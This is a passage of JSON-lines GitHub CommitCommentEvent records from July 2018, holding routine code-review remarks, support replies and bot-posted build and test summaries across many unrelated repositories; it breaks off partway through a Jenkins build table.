{"id":"8046868711","type":"CommitCommentEvent","actor":{"login":"Abbyston"},"repo":{"name":"Rapptz/discord.py"},"payload":{"comment":{"id":29912157,"position":null,"line":null,"path":null,"commit_id":"1863a1c6636f53592519320a173ec9573c090c0b","created_at":"2018-07-31T21:45:09Z","updated_at":"2018-07-31T21:45:09Z","author_association":"NONE","body":"@Harmon758 Oh thank you, I realized I had to change to python 3.6.6.\r\nWhat I meant is where do I put the code, into IDLE or the windows command prompt (I'm very new to this)"}},"created_at":"2018-07-31T21:45:09Z"}
{"id":"8046870534","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29912170,"position":18,"line":23,"path":"tests/TicTacToeTest.php","commit_id":"9021613e442df8ed09d88171cb77476ee7d35c41","created_at":"2018-07-31T21:45:33Z","updated_at":"2018-07-31T21:45:33Z","author_association":"OWNER","body":"*break it"}},"created_at":"2018-07-31T21:45:33Z"}
{"id":"8046874609","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29912181,"position":null,"line":null,"path":null,"commit_id":"081011082c581fbd5c29fd589abc86ee8f82413c","created_at":"2018-07-31T21:46:31Z","updated_at":"2018-07-31T21:46:31Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/081011082c581fbd5c29fd589abc86ee8f82413c/index.html"}},"created_at":"2018-07-31T21:46:31Z"}
{"id":"8046874866","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29912183,"position":null,"line":null,"path":null,"commit_id":"22aeee8daedeae7f991b4ae2db08fbfa71c7f86d","created_at":"2018-07-31T21:46:34Z","updated_at":"2018-07-31T21:46:34Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[1] Filtrace výjimek v adminu](https://trello.com/c/lNwF76Ev/672-1-filtrace-v%C3%BDjimek-v-adminu)"}},"created_at":"2018-07-31T21:46:34Z"}
{"id":"8046881724","type":"CommitCommentEvent","actor":{"login":"nev07"},"repo":{"name":"MelodyHeckma/ProgrammingAssignment2"},"payload":{"comment":{"id":29912198,"position":null,"line":null,"path":null,"commit_id":"31ab9d04f42ce99ebecf67568cc2c8b7070329af","created_at":"2018-07-31T21:48:13Z","updated_at":"2018-07-31T21:48:13Z","author_association":"NONE","body":"i think you should utilize the solve function in your code"}},"created_at":"2018-07-31T21:48:13Z"}
{"id":"8046882110","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29912199,"position":null,"line":null,"path":null,"commit_id":"d4dc7d54757aa47ca307f72566aafbca52f7c450","created_at":"2018-07-31T21:48:18Z","updated_at":"2018-07-31T21:48:18Z","author_association":"COLLABORATOR","body":"Puzzle `15-ad2b4fa5` disappeared from [`src/main/java/io/zold/api/RtTransaction.java`](https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java), that's why I closed #27. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-31T21:48:18Z"}
{"id":"8046883560","type":"CommitCommentEvent","actor":{"login":"MJJoyce"},"repo":{"name":"NASA-AMMOS/AIT-Core"},"payload":{"comment":{"id":29912208,"position":null,"line":null,"path":null,"commit_id":"3c391b42b01a324c145885c3c8e710b877970e76","created_at":"2018-07-31T21:48:40Z","updated_at":"2018-07-31T21:48:40Z","author_association":"MEMBER","body":":+1:\r\n"}},"created_at":"2018-07-31T21:48:40Z"}
{"id":"8046893267","type":"CommitCommentEvent","actor":{"login":"thiamsantos"},"repo":{"name":"gugutz/website-atlantida"},"payload":{"comment":{"id":29912244,"position":8,"line":28,"path":"src/js/handle-form.js","commit_id":"58dcdb64b3d5751373fe55d8cdf630cd325ac699","created_at":"2018-07-31T21:50:51Z","updated_at":"2018-07-31T21:50:51Z","author_association":"NONE","body":"Aqui você devia dar um `.json()` em vez de `.blob()` e corrigir lá na API para responder com um JSON de verdade."}},"created_at":"2018-07-31T21:50:51Z"}
{"id":"8046894123","type":"CommitCommentEvent","actor":{"login":"thiamsantos"},"repo":{"name":"gugutz/website-atlantida"},"payload":{"comment":{"id":29912247,"position":5,"line":20,"path":"src/lambda/mail.js","commit_id":"58dcdb64b3d5751373fe55d8cdf630cd325ac699","created_at":"2018-07-31T21:51:02Z","updated_at":"2018-07-31T21:51:02Z","author_association":"NONE","body":"Boa."}},"created_at":"2018-07-31T21:51:02Z"}
{"id":"8046894620","type":"CommitCommentEvent","actor":{"login":"thiamsantos"},"repo":{"name":"gugutz/website-atlantida"},"payload":{"comment":{"id":29912250,"position":5,"line":24,"path":"src/lambda/send-mail.js","commit_id":"58dcdb64b3d5751373fe55d8cdf630cd325ac699","created_at":"2018-07-31T21:51:10Z","updated_at":"2018-07-31T21:51:10Z","author_association":"NONE","body":"Boa."}},"created_at":"2018-07-31T21:51:10Z"}
{"id":"8046898629","type":"CommitCommentEvent","actor":{"login":"thiamsantos"},"repo":{"name":"gugutz/website-atlantida"},"payload":{"comment":{"id":29912259,"position":5,"line":24,"path":"src/lambda/send-mail.js","commit_id":"58dcdb64b3d5751373fe55d8cdf630cd325ac699","created_at":"2018-07-31T21:52:09Z","updated_at":"2018-07-31T21:52:09Z","author_association":"NONE","body":"Soh esse statusCode eh incorreto. Você não pode retornar 200 quando tem erro. Tens que retornar um 422 ou um 400."}},"created_at":"2018-07-31T21:52:09Z"}
{"id":"8046898856","type":"CommitCommentEvent","actor":{"login":"GChassie"},"repo":{"name":"GChassie/GChassie.github.io"},"payload":{"comment":{"id":29912262,"position":null,"line":null,"path":null,"commit_id":"f7eb4c49a366042ac163c11be5304a9e020e1011","created_at":"2018-07-31T21:52:12Z","updated_at":"2018-07-31T21:52:12Z","author_association":"OWNER","body":"Theme Update"}},"created_at":"2018-07-31T21:52:12Z"}
{"id":"8046899939","type":"CommitCommentEvent","actor":{"login":"michael-caron"},"repo":{"name":"michael-caron/tokens"},"payload":{"comment":{"id":29912264,"position":null,"line":null,"path":null,"commit_id":"9da08968a3724035f7019d81a2b9b3fb4136a8e5","created_at":"2018-07-31T21:52:27Z","updated_at":"2018-07-31T21:52:27Z","author_association":"OWNER","body":"please delete"}},"created_at":"2018-07-31T21:52:27Z"}
{"id":"8046900086","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29912266,"position":null,"line":null,"path":null,"commit_id":"86f08af4a598631ec4e579ec4e5ebf4bf2e82f1f","created_at":"2018-07-31T21:52:29Z","updated_at":"2018-07-31T21:52:29Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/86f08af4a598631ec4e579ec4e5ebf4bf2e82f1f/index.html"}},"created_at":"2018-07-31T21:52:29Z"}
{"id":"8046910822","type":"CommitCommentEvent","actor":{"login":"michael-caron"},"repo":{"name":"michael-caron/tokens"},"payload":{"comment":{"id":29912307,"position":null,"line":null,"path":null,"commit_id":"9da08968a3724035f7019d81a2b9b3fb4136a8e5","created_at":"2018-07-31T21:55:06Z","updated_at":"2018-07-31T21:55:06Z","author_association":"OWNER","body":"please delete"}},"created_at":"2018-07-31T21:55:06Z"}
{"id":"8046912344","type":"CommitCommentEvent","actor":{"login":"OliveraVuksic"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29912311,"position":3,"line":5,"path":".github/lock.yml","commit_id":"56b1fe71f59d3f59202f5949ebc48af606e5f89c","created_at":"2018-07-31T21:55:28Z","updated_at":"2018-07-31T21:55:28Z","author_association":"NONE","body":"setLockReason"}},"created_at":"2018-07-31T21:55:28Z"}
{"id":"8046912513","type":"CommitCommentEvent","actor":{"login":"KJP12"},"repo":{"name":"Terminal/DiscordForkAppdata"},"payload":{"comment":{"id":29912314,"position":null,"line":null,"path":null,"commit_id":"6b3d46cac9e6df5b6ccfa3ed316fbde50fb4d996","created_at":"2018-07-31T21:55:30Z","updated_at":"2018-07-31T21:55:30Z","author_association":"NONE","body":"I'm a bot now. :^)"}},"created_at":"2018-07-31T21:55:30Z"}
{"id":"8046919282","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29912329,"position":null,"line":null,"path":null,"commit_id":"6aee22b88f61184c0fdf03c7fc16c4cfea4ed5cd","created_at":"2018-07-31T21:57:08Z","updated_at":"2018-07-31T21:57:08Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/google-photos-images-not-downloaded/92068/13\n"}},"created_at":"2018-07-31T21:57:08Z"}
{"id":"8046919312","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/onebox"},"payload":{"comment":{"id":29912331,"position":null,"line":null,"path":null,"commit_id":"ebb4b54548d51bb63923959a16f106f787f2ad48","created_at":"2018-07-31T21:57:09Z","updated_at":"2018-07-31T21:57:09Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/google-photos-images-not-downloaded/92068/13\n"}},"created_at":"2018-07-31T21:57:09Z"}
{"id":"8046923188","type":"CommitCommentEvent","actor":{"login":"harishchilamkurthi"},"repo":{"name":"harishchilamkurthi/TheRecipeBook-Web"},"payload":{"comment":{"id":29912342,"position":null,"line":null,"path":null,"commit_id":"3123e05082fdfb92c881d5f132b251f33eb9a2b2","created_at":"2018-07-31T21:58:05Z","updated_at":"2018-07-31T21:58:05Z","author_association":"OWNER","body":"**Task** : make input fields in shopping list working(add new items to shoppinglist). using local references, once clicked on button, new ingredients should be added to the array of ingredients.\r\n**Note** : use local references and @Viewchild()"}},"created_at":"2018-07-31T21:58:05Z"}
{"id":"8046924624","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29912347,"position":null,"line":null,"path":null,"commit_id":"b6e4731a6a4bcbbf5dc3cd085ca526ae58b845d8","created_at":"2018-07-31T21:58:25Z","updated_at":"2018-07-31T21:58:25Z","author_association":"CONTRIBUTOR","body":"Unless, I missed a thing, Mangle, like Cyclone ([in this commit](https://github.com/cmangos/mangos-classic/commit/b5aed41d30794345391d9d88e8afd93e477f5ab7)) do not exist in Classic patch 1.12.x though they are present in the DBC (at least Mangle, that was previously a top tier talent, replaced later by another spell). So both commits are probably not needed for Classic core unless for consistency with other cores."}},"created_at":"2018-07-31T21:58:25Z"}
{"id":"8046925153","type":"CommitCommentEvent","actor":{"login":"shermp"},"repo":{"name":"NiLuJe/FBInk"},"payload":{"comment":{"id":29912353,"position":null,"line":null,"path":null,"commit_id":"ce2496980c933c05d7ac5b6ffe08851c571336d4","created_at":"2018-07-31T21:58:33Z","updated_at":"2018-07-31T21:58:33Z","author_association":"NONE","body":"Just a suggestion, instead of using the guestimate value `button_width_offset`, why not use `consecutive_matches / 2` to get an exact figure?"}},"created_at":"2018-07-31T21:58:33Z"}
{"id":"8046926717","type":"CommitCommentEvent","actor":{"login":"Harmon758"},"repo":{"name":"Rapptz/discord.py"},"payload":{"comment":{"id":29912361,"position":null,"line":null,"path":null,"commit_id":"1863a1c6636f53592519320a173ec9573c090c0b","created_at":"2018-07-31T21:58:56Z","updated_at":"2018-07-31T21:58:56Z","author_association":"CONTRIBUTOR","body":"@Abbyston Again, not sure what you mean. As this commit states and as gone over in #1249, it fixes an issue on 3.7; it's not necessary for 3.6. Even if you really wanted the fix, you could just pip install it directly from the branch, instead of manually modifying your discord.py version locally.\r\n\r\nFor further help, you should join either the [official discord.py server](https://discord.gg/r3sSKJJ) or the [Discord API server](https://discord.gg/discord-api), as the README recommends."}},"created_at":"2018-07-31T21:58:56Z"}
{"id":"8046927303","type":"CommitCommentEvent","actor":{"login":"ricaff"},"repo":{"name":"ricaff/test-git"},"payload":{"comment":{"id":29912367,"position":null,"line":null,"path":null,"commit_id":"77ec58871e775f65f3edf771c7e4ff6e098ac6cb","created_at":"2018-07-31T21:59:05Z","updated_at":"2018-07-31T21:59:05Z","author_association":"OWNER","body":"Relacionado con el issue #2 \r\n"}},"created_at":"2018-07-31T21:59:05Z"}
{"id":"8046929006","type":"CommitCommentEvent","actor":{"login":"lpantano"},"repo":{"name":"miRTop/mirGFF3"},"payload":{"comment":{"id":29912374,"position":null,"line":null,"path":null,"commit_id":"1cf05d3224313c517dae8852afb8e5505eb10281","created_at":"2018-07-31T21:59:29Z","updated_at":"2018-07-31T21:59:29Z","author_association":"CONTRIBUTOR","body":"That looks great! I'll bump the version now!"}},"created_at":"2018-07-31T21:59:29Z"}
{"id":"8046935228","type":"CommitCommentEvent","actor":{"login":"darkdefender228"},"repo":{"name":"darkdefender228/Hands-Detection"},"payload":{"comment":{"id":29912417,"position":null,"line":null,"path":null,"commit_id":"53760ff4a5492a65c06dacdcb56dfc7bfe42bd2e","created_at":"2018-07-31T22:00:50Z","updated_at":"2018-07-31T22:00:50Z","author_association":"OWNER","body":"Datasets for our model"}},"created_at":"2018-07-31T22:00:50Z"}
{"id":"8046937143","type":"CommitCommentEvent","actor":{"login":"Propanu"},"repo":{"name":"intel-iot-devkit/mraa"},"payload":{"comment":{"id":29912423,"position":15,"line":82,"path":"CMakeLists.txt","commit_id":"d24457f9a15f5ad4470d55bc69fbece22ce97bfc","created_at":"2018-07-31T22:01:15Z","updated_at":"2018-07-31T22:01:15Z","author_association":"MEMBER","body":"+1, I'd be fine with a cmake 3.1 requirement as pretty much all our current target OS's have a newer version."}},"created_at":"2018-07-31T22:01:15Z"}
{"id":"8046938823","type":"CommitCommentEvent","actor":{"login":"darkdefender228"},"repo":{"name":"darkdefender228/Hands-Detection"},"payload":{"comment":{"id":29912428,"position":null,"line":null,"path":null,"commit_id":"ba2421509277fb908a47e4fa0135348dcd87d181","created_at":"2018-07-31T22:01:38Z","updated_at":"2018-07-31T22:01:38Z","author_association":"OWNER","body":"Data for testing our model on real examples"}},"created_at":"2018-07-31T22:01:38Z"}
{"id":"8046940784","type":"CommitCommentEvent","actor":{"login":"gugutz"},"repo":{"name":"gugutz/website-atlantida"},"payload":{"comment":{"id":29912436,"position":null,"line":null,"path":null,"commit_id":"58dcdb64b3d5751373fe55d8cdf630cd325ac699","created_at":"2018-07-31T22:02:04Z","updated_at":"2018-07-31T22:02:04Z","author_association":"OWNER","body":"@thiamsantos Ah beleza. Tava empacado nisso. Tava tentando com JSON.parse no lugar de .json () , por isso não ia"}},"created_at":"2018-07-31T22:02:04Z"}
{"id":"8046943240","type":"CommitCommentEvent","actor":{"login":"gugutz"},"repo":{"name":"gugutz/website-atlantida"},"payload":{"comment":{"id":29912438,"position":null,"line":null,"path":null,"commit_id":"58dcdb64b3d5751373fe55d8cdf630cd325ac699","created_at":"2018-07-31T22:02:40Z","updated_at":"2018-07-31T22:02:40Z","author_association":"OWNER","body":"@thiamsantos Ah beleza. Tava empacado nisso. Tava tentando com JSON.parse no lugar de .json () , por isso não ia"}},"created_at":"2018-07-31T22:02:40Z"}
{"id":"8046946911","type":"CommitCommentEvent","actor":{"login":"ukasz89"},"repo":{"name":"ukasz89/AndroidStudio"},"payload":{"comment":{"id":29912447,"position":null,"line":null,"path":null,"commit_id":"0e8f726ceb769bfa0c787536d7cd6c3c1731526d","created_at":"2018-07-31T22:03:38Z","updated_at":"2018-07-31T22:03:38Z","author_association":"OWNER","body":"problem with view rendering"}},"created_at":"2018-07-31T22:03:38Z"}
{"id":"8046950450","type":"CommitCommentEvent","actor":{"login":"ukasz89"},"repo":{"name":"ukasz89/AndroidStudio"},"payload":{"comment":{"id":29912456,"position":null,"line":null,"path":null,"commit_id":"0e8f726ceb769bfa0c787536d7cd6c3c1731526d","created_at":"2018-07-31T22:04:30Z","updated_at":"2018-07-31T22:04:30Z","author_association":"OWNER","body":"problem with view rendering"}},"created_at":"2018-07-31T22:04:30Z"}
{"id":"8046951902","type":"CommitCommentEvent","actor":{"login":"lucaspatel"},"repo":{"name":"jacobseanpatel/jacobseanpatel.github.io"},"payload":{"comment":{"id":29912471,"position":38,"line":93,"path":"styles.css","commit_id":"d7d8a1f1b3a94b636f599d6e5de00758f5cc9880","created_at":"2018-07-31T22:04:54Z","updated_at":"2018-07-31T22:04:54Z","author_association":"NONE","body":"Should be 'font-family: \"pinkblue\";'"}},"created_at":"2018-07-31T22:04:54Z"}
{"id":"8046952543","type":"CommitCommentEvent","actor":{"login":"tfogo"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29912472,"position":7,"line":7,"path":"content/en/docs/reference/glossary/flexvolume.md","commit_id":"4cddc45ab778a32adbe6d976615ee08d53ab1c7d","created_at":"2018-07-31T22:05:04Z","updated_at":"2018-07-31T22:05:04Z","author_association":"CONTRIBUTOR","body":"I believe \"Flexvolume\" is the correct term. I'm taking that from the [design proposal](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/storage/flexvolume-deployment.md). \r\n\r\nI agree that the docs are inconsistent. I think that confusion is due to the fact that `flexVolume` is the volume type you would need to define in YAML. But there are areas in the docs it should be cleaned up (`FlexVolume` definitely isn't correct for example)."}},"created_at":"2018-07-31T22:05:04Z"}
{"id":"8046953215","type":"CommitCommentEvent","actor":{"login":"tfogo"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29912475,"position":18,"line":18,"path":"content/en/docs/reference/glossary/flexvolume.md","commit_id":"4cddc45ab778a32adbe6d976615ee08d53ab1c7d","created_at":"2018-07-31T22:05:15Z","updated_at":"2018-07-31T22:05:15Z","author_association":"CONTRIBUTOR","body":"> The Storage SIG suggests implementing a CSI driver if possible\r\n\r\nI should rephrase this as it sounds like it is advice to users. My understanding is users should still feel free to use Flexvolumes if they want. This advisory is directed to storage vendors who want to implement their own storage plugins."}},"created_at":"2018-07-31T22:05:15Z"}
{"id":"8046956832","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29912485,"position":null,"line":null,"path":null,"commit_id":"3e972f46556ff2ace57c4584d01827aa3b61f826","created_at":"2018-07-31T22:06:09Z","updated_at":"2018-07-31T22:06:09Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2999 of 2999 tests passed, 628 test warnings)\n\nMessages:\n\n * 628 tests had: EIO diffs.\n * 549 tests had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T22:06:09Z"}
{"id":"8046959343","type":"CommitCommentEvent","actor":{"login":"craigbarnes"},"repo":{"name":"danieldop/lua-gumbo"},"payload":{"comment":{"id":29912498,"position":null,"line":null,"path":null,"commit_id":"d75a6cad7db74b329d6ca11f428b9ccfaaff246a","created_at":"2018-07-31T22:06:48Z","updated_at":"2018-07-31T22:06:48Z","author_association":"NONE","body":"Hi. I noticed you uploaded a patched [rockspec](https://luarocks.org/modules/danieldop/cx-gumbo) to fix the outdated `source.url` issue. FYI, I've just uploaded a [`0.4-2`](https://luarocks.org/modules/craigb/gumbo) rockspec with the same fix."}},"created_at":"2018-07-31T22:06:48Z"}
{"id":"8046963341","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29912513,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-31T22:07:51Z","updated_at":"2018-07-31T22:07:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T22:07:51Z"}
{"id":"8046964562","type":"CommitCommentEvent","actor":{"login":"pdelteil"},"repo":{"name":"pdelteil/picoctf_2017_writeup"},"payload":{"comment":{"id":29912517,"position":null,"line":null,"path":null,"commit_id":"ff6aba8d39379d7aaaa242160a3fbb9ea4d7e8da","created_at":"2018-07-31T22:08:10Z","updated_at":"2018-07-31T22:08:10Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-31T22:08:10Z"}
{"id":"8046965694","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29912522,"position":null,"line":null,"path":null,"commit_id":"688128aee04346a2f3e54f5b4808d95a7d137090","created_at":"2018-07-31T22:08:28Z","updated_at":"2018-07-31T22:08:28Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - i386-Windows-7-VisualStudio-14: OK (2934 of 2954 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 658\n * Failed: 1\n\nintegration Test Summary\n * Passed: 607\n * Failed: 19\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-688128aee04346a2f3e54f5b4808d95a7d137090-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-688128aee04346a2f3e54f5b4808d95a7d137090-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.32%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T22:08:28Z"}
{"id":"8046966404","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29912524,"position":null,"line":null,"path":null,"commit_id":"32d1f6febd3d92065fccabbd129b6d831f7e074a","created_at":"2018-07-31T22:08:39Z","updated_at":"2018-07-31T22:08:39Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-603](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-603).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-603-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T22:08:39Z"}
{"id":"8046968544","type":"CommitCommentEvent","actor":{"login":"tfogo"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29912532,"position":20,"line":20,"path":"content/en/docs/reference/glossary/flexvolume.md","commit_id":"4cddc45ab778a32adbe6d976615ee08d53ab1c7d","created_at":"2018-07-31T22:09:12Z","updated_at":"2018-07-31T22:09:12Z","author_association":"CONTRIBUTOR","body":"I think taking out the \"More Information\" link is fine. We should keep the link to the FAQ in. That's not directly linked from the others and I think it's important information to surface. "}},"created_at":"2018-07-31T22:09:12Z"}
{"id":"8046968652","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29912533,"position":30,"line":4182,"path":"src/game/Spells/Spell.cpp","commit_id":"78b1371a41bfaddea921ab48ec725fd9dc01e815","created_at":"2018-07-31T22:09:13Z","updated_at":"2018-07-31T22:09:13Z","author_association":"CONTRIBUTOR","body":"Won't this line be unreachable as `m_healingPerEffect[i]` was previously set to 0 in case `IsEffectWithImplementedMultiplier(eff)` is true? Same goes for `m_damagePerEffect[i]`."}},"created_at":"2018-07-31T22:09:13Z"}
{"id":"8046973412","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29912543,"position":null,"line":null,"path":null,"commit_id":"727657fa8d3be38ebe18eca8af3ed5dac5673c6e","created_at":"2018-07-31T22:10:23Z","updated_at":"2018-07-31T22:10:23Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/727657fa8d3be38ebe18eca8af3ed5dac5673c6e/index.html"}},"created_at":"2018-07-31T22:10:23Z"}
{"id":"8046977966","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":29912563,"position":null,"line":null,"path":null,"commit_id":"2b114696996ddb604be84f73ec066b7bbde2004b","created_at":"2018-07-31T22:11:32Z","updated_at":"2018-07-31T22:11:32Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ximinez/rippled/commit/2b114696996ddb604be84f73ec066b7bbde2004b)\n\nBuilt at __20180731 - 22:11:32__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 538s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 839s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 926s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 558s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 277s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 265s | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 288s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 398s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 720s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 288s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 420s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1164s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 290s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 262s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/x-subscribe-book/17//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 392s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | 